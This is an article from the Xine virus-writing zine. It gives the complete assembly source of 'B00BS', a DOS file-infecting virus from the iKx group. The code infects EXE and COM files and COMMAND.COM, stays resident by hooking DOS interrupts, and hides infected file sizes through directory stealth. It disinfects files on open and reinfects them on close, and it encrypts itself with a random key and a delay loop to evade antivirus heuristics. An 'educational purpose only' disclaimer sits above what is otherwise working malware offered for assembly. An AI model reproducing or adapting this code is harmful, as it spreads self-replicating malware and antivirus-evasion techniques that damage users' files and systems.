Copy Link
Add to Bookmark
Report
xine-2.029
/-----------------------------\
| Xine - issue #2 - Phile 029 |
\-----------------------------/
;******************************************************************************
; THIS IS FOR EDUCATIONAL PURPOSE ONLY Gi0rGeTt0
;
; Virus name : B00BS
; Author : Unknwon :)
; Group : iKx
; Origin : Italy 1996/97
; Compiling : Use TASM
; TASM /M2 B00BS.ASM
; TLINK B00BS
; Targets : EXE COM
; Features : stealth via 11h,12h,4eh,4fh,disinfect and infect on the fly
; on opening(3dh,6c00h) and closing(3eh) ,int 24h handler
; TSR by MCB and int21h (48h)
; uses some 386 instructions for some routines (just for fun)
; fucks TBAV,AVP,F-PROT heuristic shits
; improvements : needs a poly engine
; payload : none
; Greetings : to all the guys of the iKx and all the
; other guys on #virus.
;
;******************************************************************************
;flflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflfl
; The file is a EXE
.386
CSeg SEGMENT USE16
ASSUME cs:CSeg
FileHeaderRecord struc
signature dw ?
sizemod dw ?
msize dw ?
relocat dw ?
headsize dw ?
minalloc dw ?
maxalloc dw ?
stackseg dw ?
stackofs dw ?
check dw ?
ip dw ?
codes dw ?
Checksum dw ?
checkOvr dw ?
FileHeaderRecord ends
SearchRecord struc
date dw ?
time dw ?
SearchRecord ends
ExecBlockRecord struc
Env dw ?
Cmd dd ?
ExecBlockRecord ends
Findrecord struc
FindBuf db 128 dup (?)
Findofs dw ?
Findrecord ends
VIR_PAR = ((END_TSR - START_TSR ) / 16) + 2
VIR_LEN = (REAL_CODE - START_TSR) + 1 ; dim virus in memoria
VIR_TRUE_LEN = ( REAL_CODE - START_TSR ) + 1 ; dimensione del virus su file
already = 0 ; already infected
ready = 1 ; ready to be infected
com = 2 ; com file
exe = 3 ; exe file
other = 4 ; other
true = 1
false = 0
maxfiles = 26 ; max file no to open , must be (maxfiles*2)/4 integer
START_TSR equ $
AfterCryp : call SH
SH : pop bp
sub bp,3
push ds
pop es
mov ax,0fe01h
int 2fh
cmp al,0ffh
jne short Novirus
YesVirus : db 0e9h
jmp_addr dw ?
mov ax,ds ; ES = DS = PSP = AX
add ax,10h ; PSP + 1 paragraph
mov bx,cs:[bp][templateheader.stackseg]
add bx,ax
cli
mov ss,bx
mov sp,cs:[bp][templateheader.stackofs]
sti
mov bx,cs:[bp][templateheader.codes]
add bx,ax
push bx ; push CS
push cs:[bp][templateheader.ip] ; push IP
@jump : xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
xor esi,esi
xor edi,edi
xor ebp,ebp
retf ; jmp to host CS:IP
com_exec : push cs ; COM settings
mov si,bp
add si,offset @com_buf
mov di,100h
push di
cld
movsd
jmp short @jump
NoVirus : mov es,word ptr ds:[2ch] ; enviroment segment
mov word ptr cs:[bp][tmp_COMseg],es
push ds
mov ax,ds ; DS = PSP
dec ax ; AX = MCB
mov ds,ax
mov bl,02h ; last fit
mov ax,5801h
int 21h ; set
mov bx,VIR_PAR ; malloc
mov ah,48h
int 21h
jnc short malloc ; problems ?
push ax dx
mov ah,2
mov dl,7
int 21h
pop dx ax
push ds
pop ax
mov bx,4d03h
mov ds:[0],bh ;'M'
xor bh,bh
sub word ptr ds:[bx],VIR_PAR
inc ax
add ax,ds:[bx]
mov ds,ax
mov word ptr ds:[bx],VIR_PAR-1
mov bl,'Z'
mov ds:[0],bl ; Z in last MCB
inc ax
malloc : mov es,ax
dec ax
push ax
pop ds
mov bx,8
mov ds:[1],bx ; owned by dos 0008
mov word ptr ds:[bx],'CS'
xor bl,bl ; restore strategy
mov ax,5801h
int 21h
cld
xor di,di
mov si,bp
push cs
pop ds
mov cx,(VIR_LEN / 4) + 1
rep movsd
call clean_x_stack
cli
xor ax,ax
mov ds,ax
mov eax,es
shl eax,16
mov ax,offset HOOK_21
xchg ds:[84h],eax
mov es:TRAPPED_21,eax
mov eax,es
shl eax,16
mov ax,offset HOOK_2F
xchg ds:[0bch],eax
mov es:TRAPPED_2F,eax
pop ds ; DS = PSP
mov es:sleep,FALSE
mov es:command_Flag,TRUE
mov ax,cs:[bp][tmp_COMseg]
mov es:COMseg,ax
push ds
pop es
sti
jmp yesvirus
tmp_COMseg dw ?
HOOK_2F : cmp ah,0feh
jne short ChkintWin
mov al,0ffh
iret
;///// Chkintwin and ChkEndwin disable the virus during installation check in
; win311 and under Msdos prompt in w95 /////
; Under Msdos prompt only some int21h trap worked :(( i.e 4b
; but 3dh,3eh and some other as all long filenames functions didn't work
; i dunno the reason since i hadn't much time for solving the question
; if someone can explain it let me know pleaze :)
ChkintWin : cmp ax,1605h
jne short chkendwin
mov cs:sleep,TRUE
jmp short pass2f
ChkEndWin : cmp ax,1606h
jne short pass2f
mov cs:sleep,FALSE
pass2f : db 0eah
TRAPPED_2F dd ?
HOOK_21 : cmp cs:command_flag,TRUE
jne short Check_int
call @COMM_COM
Check_int : cmp cs:sleep,TRUE
je short org_21
cmp ax,cs:[intr_sub_w] ;4b00h
je @EXEC00
cmp ax,cs:[intr_sub_w+2] ;4b01h
je @LD&EX
cmp ah,cs:[intr_sub_b] ;1ah
je @SAVEDTA
cmp ah,cs:[intr_sub_b+1] ;4eh
je @FINDFIRST
cmp ah,cs:[intr_sub_b+2] ;4fh
je @FINDNEXT
cmp ah,cs:[intr_sub_b+3] ;3dh
je @OPEN
cmp ah,cs:[intr_sub_b+4] ;3eh
je @CLOSE
cmp ax,cs:[intr_sub_w+4] ;6c00h
je @EXTOPEN
cmp ah,cs:[intr_sub_b+5] ;11h
je @FCB_FIND
cmp ah,cs:[intr_sub_b+6] ;12h
je @FCB_FIND
org_21 : db 0eah
TRAPPED_21 dd ?
@COMM_COM : pushad
push ds es
cld
mov ax,cs:COMseg
mov es,ax
xor di,di
mov cx,256
@pre_loop : mov eax,'SMOC'
@loop_a : scasd
jz short @nxt_ck
sub di,3
loop @loop_a
jmp @fail
@nxt_ck : mov eax,'=CEP'
scasd
jz short @it_is
sub di,3
jmp short @pre_loop
@it_is : push es
pop ds
mov si,di
push cs
pop es
mov di,offset Data_Buffer
mov cx,256
@loop_b : lodsb
or al,al
jz short @copy_end
stosb
loop @loop_b
@copy_end : stosb
push cs
pop ds
mov dx,offset Data_Buffer ; DS:DX command.com path
mov bx,dx
call GetFattrib ; CX attributo
jc short @fail
push cx dx ds
call openfile ; BX handle
call FileInfect
call closefile
pop ds dx cx
call SetFattrib
@fail : pop es ds
popad
mov cs:command_flag,FALSE
ret
@EXEC00 : call CheckIfExe
jnz org_21
pushad
push es ds ; DS:DX ASCIZ filename
call vir_handler
call getFattrib
jc short @no_inf ; CX attributo
push cx ds dx
call openfile
call FileInfect
call closefile
pop dx ds cx
call SetFattrib
@no_inf : call dos_handler
pop ds es
popad
call int21h
jmp Intret
@LD&EX : push es ds
pushad
call vir_handler
call GetFattrib
jc short ex_ld ; CX attributo
push cx dx ds
call OpenFile
jc short ex_ld
call FileClean
call closefile
pop ds dx cx
call SetFattrib
ex_ld : call dos_handler
popad
pop ds es
push ds dx
call int21h
pop dx ds
pushf
push es ds
pushad
call vir_handler
call GetFattrib
jc short not_ld ; CX attrib
push cx ds dx
call OpenFile
call FileInfect
call closefile
pop dx ds cx
call SetFattrib
not_ld : call dos_handler
popad
pop ds es
popf
jmp Intret
@OPEN : call CheckIfExe
jnz org_21
push es ds
pushad
call vir_handler
call GetFattrib
jc short Skip_file ; CX attrib
push cx ds dx
call OpenFile
call FileClean
call CloseFile
pop dx ds cx
call SetFattrib
call dos_handler
popad
pop ds es
push ds dx
call int21h
pop dx ds
jc short @no_open
xchg ax,bx
call PushHandle
xchg bx,ax
jmp Intret
@no_open : pushf
cmp al,5
jne short @no_mat
push es ds
pushad
call vir_handler
call GetFattrib
jc short @a
push cx ds dx
call OpenFile
call FileInfect
call CloseFile
pop dx ds cx
call SetFattrib
call dos_handler
@a : popad
pop ds es
@no_mat : popf
jmp Intret
Skip_file : popad
pop ds es
call dos_handler
jmp org_21
@EXTOPEN : xchg si,dx
call CheckIfExe
xchg dx,si
jnz org_21
push es ds
pushad
call vir_handler
mov dx,si
call GetFattrib
jc short @aa
push cx ds dx
call OpenFile
call FileClean
call closefile
pop dx ds cx
call SetFattrib
@aa : call dos_handler
popad
pop ds es
push ds si
call int21h
pop dx ds
jc @no_open
xchg ax,bx
call PushHandle ; save handle
xchg bx,ax
jmp Intret
; // SFT and JFT didn't work in Msdos Prompt :(( //
@CLOSE : call Pophandle
jc org_21
call vir_handler
pushad
push ds es
push bx
mov ax,1220h ; BX handle
call int2fh ; ES:DI JFT
xor bx,bx
mov bl,byte ptr es:[di]
mov ax,1216h ; bx entry number for
call int2fh ; ES:DI SFT
mov byte ptr es:[di+2],2
pop bx
call FileInfect
pop es ds
popad
call int21h ; exec int
call dos_handler
clc
jmp Intret
@FINDFIRST : push ax cx si di es ; DS:DX find filename
pushf
mov si,dx
push cs
pop es
mov di,offset findvar
cld
push di
xor ax,ax
mov cx,(size Findvar - 2) / 2
rep stosw ; reset Findvar
pop di
mov ah,60h ; DS:SI filename
call Int21h ; ES:DI canonaized
mov di,offset findvar + size findvar - 2
mov cx,size findvar - 2 - 1
std
mov al,'\'
repnz scasb
jz short o
sub di,3
o : add di,2
mov cs:Findvar.Findofs,di
popf
pop es di si cx ax
@FINDNEXT : call int21h
jc Intret
FindProc : pushad
push ds es
pushf
mov ds,cs:DTAseg
mov si,cs:DTAofs
add si,1eh ; DS:SI punta al
; filename nella DTA
push cs
pop es
mov di,cs:findvar.findofs ; ES:DI path filename
cld
CopyName: movsb
cmp byte ptr ds:[si],0
jne short CopyNAme
mov byte ptr es:[di],0
; Findvar now has the ASCIZ filename to pass to Openfile
push cs
pop ds
mov dx,offset Findvar
call CheckIfExe
jnz short DonotTreat
call OpenFile
jc short DoNotTreat
call CheckXinf
cmp file_type,other
je short CanClose
cmp file_status,already
jne short CanClose
mov es,DTAseg
mov di,DTAofs
sub dword ptr es:[di+1ah],vir_true_len - 1
CanClose : call CloseFile
DoNotTreat: popf
pop es ds
popad
jmp Intret
@SAVEDTA : mov cs:DTAofs,dx
mov cs:DTAseg,ds
jmp org_21
@FCB_FIND : call int21h
pushf
push es ax bx
les bx,dword ptr cs:DTAofs
mov al,byte ptr es:[bx]
cmp al,0ffh ; vede se FCB esteso
jne short @ok_good
add bx,7
@ok_good : pusha
push ds es
mov ah,47h ; get cur dir
mov dl,byte ptr es:[bx] ; drive number
push cs
pop ds
mov si,offset FindVar
call int21h ; return ASCIZ directory
push cs
pop es
cld
cmp byte ptr ds:[si],0 ; root ?
jne short @path
mov ax,offset FindVar
add ax,3
mov cs:FindVar.FindOfs,ax
jmp short @root
@path : mov di,offset FindVar
xor al,al
@@f : scasb ; look for the end of the dirname
jnz short @@f
mov si,di
dec si
mov byte ptr es:[si],'\'
add di,3
mov es:FindVar.FindOfs,di
dec di
std
@cp : movsb
cmp si,offset FindVar
jae short @cp
@root : mov word ptr es:[offset FindVar+1],'\:'
add dl,'A' - 1
mov byte ptr es:[offset FindVar],dl ; drive letter
pop es ds
popa
pusha
push ds es ; ES:BX DTA
push es
pop ds ; DS = ES
mov si,1
add si,bx ; file name ds:si
push cs
pop es
mov di,cs:FindVar.FindOfs
mov cx,8
cld
@lp1 : lodsb
cmp al,20h
je short @end_1
stosb
loop @lp1
@end_1 : mov al,'.'
stosb
mov cx,3
mov si,9
add si,bx
rep movsb
xor al,al
stosb ; Z terminated
push cs
pop ds
mov dx, offset FindVar ; ASCIZ filename
mov bp,bx
call CheckIfExe
jnz short @not_op
call OpenFile
jc short @not_op
call CheckXinf
cmp file_type,other
je short @CanClose
cmp file_status,already
jne short @CanClose
mov es,cs:DTAseg
sub dword ptr es:[bp+1dh],VIR_TRUE_LEN - 1 ; real size
@CanClose : call CloseFile
@not_op : pop es ds
popa
@NotInf : pop bx ax es
popf
Intret proc
cli
push ax
pushf
pop ax
add sp,8
push ax
sub sp,6
pop ax
sti
iret
Intret endp
int21h proc
pushf
call dword ptr cs:TRAPPED_21
ret
int21h endp
int2fh proc
pushf
call dword ptr cs:TRAPPED_2F
ret
int2fh endp
vir_handler proc
cli
push eax ds
xor ax,ax
mov ds,ax
mov eax,cs
shl eax,16
mov ax,offset critical
xchg ds:[90h],eax
mov cs:TRAPPED_24,eax
pop ds eax
sti
ret
vir_handler endp
dos_handler proc
push ds ax
cli
xor ax,ax
mov ds,ax
db 66h
dw 06c7h
dw 0090h
TRAPPED_24 dd ? ; mov ds:[90h],cs:TRAPPED_24
pop ax ds
sti
ret
dos_handler endp
critical proc
xor al,al
iret
critical endp
openfile proc
mov ah,3dh
xor al,al
add al,2
; mov ax,3d02h
call int21h
mov bx,ax
ret ; out : BX handle
openFile endp
closeFile proc
mov ah,3eh ; in : BX handle
call int21h
ret
closefile endp
GetFAttrib proc
push ax
mov ah,43h
xor al,al
; mov ax,4300h
push ax
call int21h ; CX attributo
pop ax
inc al
push cx
; mov ax,4301h
push ax
call int21h
pop ax
jc short out_f
; mov ax,4301h
mov cx,32
call int21h
out_f : pop cx
pop ax ; ritorna CX attributo
ret ; ritona carry se errore
SetFattrib proc
push ax ; in CX attributo
mov ah,43h
xor al,al
inc al
; mov ax,4301h
call int21h
pop ax
ret
SetFattrib endp
GetFAttrib endp
FileEnd proc
mov ah,42h
xor al,al
add al,2
; mov ax,4202h
xor cx,cx
xor dx,dx
call int21h ; DX:AX file size
ret
FileEnd endp
Filestart proc
xor cx,cx
xor dx,dx
Filestart endp
FileSeek proc
mov ax,4200h
call int21h
ret
FileSeek endp
blockread proc
mov ah,3fh
call int21h
ret
blockread endp
blockwrite proc
mov ah,40h
call int21h
ret
blockwrite endp
GetDateTime proc
mov ah,57h
xor al,al
; mov ax,5700h
call Int21h
mov cs:searchrec.date,dx
mov cs:searchrec.time,cx
ret
GetdateTime endp
SetDateTime proc
mov dx,cs:searchrec.date
mov cx,cs:searchrec.time
mov ah,57h
xor al,al
inc al
; mov ax,5701h
call Int21h
ret
SetdateTime endp
commit_file proc
mov ah,68h
call int21h ; commit file
ret
commit_file endp
clean_x_stack proc
mov di,offset searchstack
mov cx, (size searchstack) / 4
xor eax,eax
rep stosd
ret
clean_x_stack endp
CheckIfExe proc ; DS:DX filename
push es di ax
push ds
pop es
cld
mov di,dx ; ES:DI filename
xor ax,ax
FindZ : scasb
jnz short FindZ
cmp dword ptr [di-5],'exe.'
je short is_exe
cmp dword ptr [di-5],'EXE.'
je short is_exe
cmp dword ptr [di-5],'moc.'
je short is_exe
cmp dword ptr [di-5],'MOC.'
is_exe : pop ax di es
ret
CheckIfExe endp
PushHandle proc
pushf
push ax cx es di
push cs
pop es
mov di,offset SearchStack ; ES:DI SearchStack
cld
mov cx,maxfiles
xor ax,ax
repnz scasw
jnz short Nofree
mov word ptr es:[di-2],bx ; sets handle
Nofree: pop di es cx ax
popf
ret
PushHandle endp
PopHandle proc
push ax cx es di
or bx,bx
jz short Nofree1 ; BX = 0 ?
push cs
pop es
cld
mov di,offset SearchStack
mov cx,maxfiles
mov ax,bx
repnz scasw
jnz short Nofree1
mov word ptr es:[di-2],0 ; free handle
clc
jmp short exitpop
Nofree1 : stc
Exitpop : pop di es cx ax
ret
PopHandle endp
Calc_check proc
push si ; DS = CS
xor dx,dx
mov si,size fileheader - 4
@chk : add dx,[si+offset fileheader]
sub si,2
jnz short @chk
pop si ; DX = checksum
ret
Calc_check endp
CheckXinf proc
mov file_status,already
call Filestart
mov cx,size Fileheader
mov dx, offset Fileheader
call BlockRead
mov cx,cs:[MZsig]
dec cx
cmp fileheader.signature,cx
je short IsanExe
mov cx,cs:[ZMsig]
dec cx
cmp fileheader.signature,cx ; vede se e' un file EXE
je short IsanExe
mov file_type,com
call FileEnd ; DX:AX dim file
sub ax,VIR_TRUE_LEN - 1
add ax,NONCRYPTED - START_TSR
sub ax,3
cmp ax,word ptr fileheader.signature+1
je GotoEnd ; infected
jmp Except
IsAnExe : mov file_type,exe
cmp fileheader.Checksum,40h
jne short @good ; not a PE,NE,LE ....
mov file_type,other
jmp GotoEnd
@good : call calc_check
cmp dx,fileheader.CheckOvr
je GoToEnd ; already infected
Cont : call FileEnd ; DX:AX dimens file
shl edx,16
mov dx,ax
movzx edi,fileheader.msize
movzx esi,fileheader.sizemod
dec edi
imul edi,512
add edi,esi
cmp edi,edx ; malloc = filesize
je short Except
;//**** SFT and JFT doesnt work in dos7 prompt from w95 :(( ****** ///
;//**** This is used for infecting COMMAND.COM under dos7 which is not a .COM
;//**** file but a real EXE
Chk_Com : push bx es
mov ax,1220h ; BX handle
call int2fh ; ES:DI JFT
xor bx,bx
mov bl,byte ptr es:[di]
mov ax,1216h ; bx entry number for
call int2fh ; ES:DI SFT
cld
add di,20h ; go to filename
mov eax,'MMOC'
scasd
jnz short no_com_com
mov eax,' DNA'
scasd
jnz short no_com_com
mov ax,'OC'
scasw
no_com_com : pop es bx
jz short except
mov file_type,other
jmp short GotoEnd
except : mov file_status,ready
GoToEnd : call FileEnd
ret
; DX:AX dimensione file
CheckXinf endp
FileInfect proc
push cs cs
pop ds es
call CheckXInf ; DX:AX dimens file
cmp file_type,other
je Infectexit
cmp file_status,ready
jne infectexit
cld
mov word ptr f_size,ax ; salva dim per .COM
mov si,offset fileheader
mov di,offset @com_buf
movsd
cmp dx,0
ja short @not_less
cmp ax,23000
ja short @not_less
jmp infectexit
@not_less : cmp dx,7
ja Infectexit
cld
mov si,offset fileheader + 2
mov di,offset templateheader + 2
mov cx,(size fileheader) / 2 - 1
rep movsw
push ax dx
add ax,VIR_TRUE_LEN
adc dx,0
mov cx,512
div cx
inc ax ; AX = quoziente DX=resto
mov fileheader.msize,ax ; nuova memory size
mov fileheader.sizemod,dx ; nuovo memory module
pop dx ax
add ax,NONCRYPTED - START_TSR
adc dx,0
mov cx,16
div cx ; AX:DX = CS:IP
mov fileheader.ip,dx
push ax
xor dx,dx
mov ax,VIR_TRUE_LEN
add ax,cx
add fileheader.ip,ax
mov cx,16
div cx
sub fileheader.ip,dx
mov dx,fileheader.ip
dec dx
mov first_addr,dx
sub dx,NONCRYPTED - START_TSR
mov cmp_addr,dx
mov dx,ax
pop ax
sub ax,dx
sub ax,fileheader.headsize
mov fileheader.codes,ax ; setta CS:IP nuovi
mov fileheader.stackseg,ax
add fileheader.stackofs,(VIR_PAR + 4) * 16 ; mi metto al sicuro
call GetDateTime
call calc_check ; dx checksum
mov fileheader.checkovr,dx
LeaveSo : call FileStart
cmp file_type,com
jne @exe1
mov jmp_addr,offset com_exec - offset yesvirus - 3
mov byte ptr fileheader,0e9h
mov cx,f_size
add cx,NONCRYPTED - START_TSR
sub cx,3
mov word ptr fileheader+1,cx
add cx,102h
mov first_addr,cx
sub cx,NONCRYPTED - START_TSR
mov cmp_addr,cx
mov dx,offset FIleheader
mov cx,3
call BlockWrite
jmp short ordinary
@exe1 : mov jmp_addr,0
mov dx,offset Fileheader
mov cx,size fileheader
call BlockWrite ; scrive header
ordinary : call FileEnd
call Criptate ; return CX =
; virus lenght
mov dx,offset Data_Buffer
mov cx,VIR_TRUE_LEN - 1
call BlockWrite
call SetDateTime
call commit_file
InfectExit : ret
FileInfect endp
FileClean proc
push cs
pop ds
call CheckXInf ; DX:AX dimens file
cmp file_type,other
je clean_out
cmp file_status,already
jne clean_out
sub ax,size templateheader + 4 ;size @com_buf
sbb dx,0
mov cx,dx
mov dx,ax
call FileSeek
mov cx,size templateheader + 4 ;size @com_buf
; read real fileheader
mov dx,offset @com_buf
call Blockread
call FileStart
call GetdateTime
cmp file_type,com
jne short @exe2
mov cx,4
mov dx,offset @com_buf
call Blockwrite
jmp short ordinary1
@exe2 : mov cx,cs:[MZsig]
dec cx
mov templateheader.signature,cx
mov dx,offset templateHeader
mov cx,size templateheader
call BlockWrite
ordinary1 : call fileEnd
sub ax,vir_true_len - 1
sbb dx,0
mov cx,dx
mov dx,ax
call FileSeek
xor cx,cx
call Blockwrite
call SetDateTime
call commit_file
clean_out : ret
FileClean endp
Criptate proc
push bx
xor bx,bx
mov ds,bx
mov bx,word ptr ds:[46ch] ; ritorna numero casuale
push cs cs
pop ds es
mov k_code,bl
mov k1_code,bl
mov si,bx
and si,3
cmp si,3
jl short @well
xor si,si
@well : mov bh,byte ptr [offset cripstyle+si]
mov cripmode,bh
mov bh,byte ptr [offset uncripstyle+si]
mov uncripmode,bh
std
mov si,offset NONCRYPTED - 1
mov di,offset Data_Buffer + (NONCRYPTED - START_TSR) - 1
@crip : bt si,15
jc short @stop
lodsb
cripmode db ?
k_code db ? ; xor add sub ,k_code
stosb
jmp short @crip
@stop : cld
mov si,offset @uncr_code
mov di,offset offset Data_Buffer + (NONCRYPTED - START_TSR)
mov cx,REAL_CODE - offset @uncr_code
rep movsb
pop bx
ret
Criptate endp
Cripstyle db 034h ; xor
db 04h ; add
db 02ch ; sub
Uncripstyle db 34h ; xor
db 2ch ; sub
db 04h ; add
Message db '|||-(BOOBS-)||| Virus , Once again deep in Terronia Land '
db '1997 Bari'
intr_sub_w dw 4b00h,4b01h,6c00h
intr_sub_b db 1ah,4eh,4fh,3dh,3eh,11h,12h
MZsig dw 'ZM'+1
ZMsig dw 'MZ'+1
NONCRYPTED equ $
@uncr_code : db 0beh
first_addr dw ? ; mov si,first_addr
@uncr : db 02eh ; xor cs:[si]
db 80h
uncripmode db ?
k1_code db ?
mov cx,4000 ; do-nothing loop
@m1: inc si ; to waste time
dec si ; to
loop @m1 ; fuck AVP
dec si
db 81h
db 0feh
cmp_addr dw ? ; cmp si,
jne short @uncr
@end : jmp AfterCryp
@com_buf db 4 dup (?)
templateheader FileheaderRecord <> ; real file header
REAL_CODE equ $
Fileheader FileheaderRecord <> ; header
file_status db ? ; infection flag
file_type db ?
sleep db ? ; flag for Windows 3.X
command_flag db ? ; infect command.com ?
Searchrec Searchrecord <> ; date & time record
SearchStack dw Maxfiles dup (?) ; stack for f-handle
FindVar Findrecord <> ; findfirst & findnext
SFT db 03bh dup (0) ; System File Table Buffer
DTAofs dw ? ; DTA for Findfirst,next
DTASeg dw ?
COMSeg dw ? ; SEG for command.com
f_size dw ? ; com size
Data_Buffer db VIR_TRUE_LEN + 16 dup (?) ; Virus temp buffer
END_TSR equ $
main : mov ax,ds ; DS = PSP
dec ax ; AX = MCB
mov ds,ax
mov byte ptr ds:[0],'M'
sub word ptr ds:[3],VIR_PAR
inc ax
add ax,ds:[3]
mov ds,ax
mov byte ptr ds:[0],'Z' ; Z nell'ultimo MCB
mov word ptr ds:[1],0008
mov word ptr ds:[3],VIR_PAR-1
mov word ptr ds:[8],'CS'
inc ax ; SEG TSR
cld
mov es,ax
xor si,si
xor di,di
push cs
pop ds
mov cx,(VIR_LEN / 4) + 1
rep movsd
call clean_x_stack
cli
xor ax,ax
mov ds,ax
mov eax,es
shl eax,16
mov ax,offset HOOK_21
xchg ds:[84h],eax
mov es:TRAPPED_21,eax
mov eax,es
shl eax,16
mov ax,offset HOOK_2F
xchg ds:[0bch],eax
mov es:TRAPPED_2F,eax
mov es:sleep,FALSE
mov es:command_flag,FALSE
sti
mov ax,4c00h
int 21h
CSeg ends
end main